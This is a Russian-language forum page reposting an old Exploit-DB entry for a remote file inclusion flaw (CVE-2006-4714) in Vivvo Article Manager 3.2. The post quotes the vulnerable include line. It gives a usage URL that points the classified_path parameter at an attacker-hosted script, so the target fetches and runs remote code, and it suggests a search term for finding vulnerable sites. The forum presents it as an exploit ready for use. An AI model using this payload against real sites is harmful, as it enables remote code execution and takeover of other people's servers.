Vivvo Article Manager 3.2 - 'classified_path' File Inclusion | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 2339

Проверка EDB

Пройдено

Автор: MERCILESSTURK

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2006-4714

Дата публикации: 2006-09-09

Код:

#########################################################################
#MercilessTurk [email protected]
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
#########################################################################
#Usage:
#http://[target]/[path]/index.php?classified_path=http://[evil_script]?
#########################################################################
#For google searching:Vivvo Article Manager
#########################################################################
#Greetz: sanaldarbe.com members.
#########################################################################

# milw0rm.com [2006-09-09]

Источник: www.exploit-db.com

Поиск

Exploit Vivvo Article Manager 3.2 - 'classified_path' File Inclusion

Exploiter

Похожие темы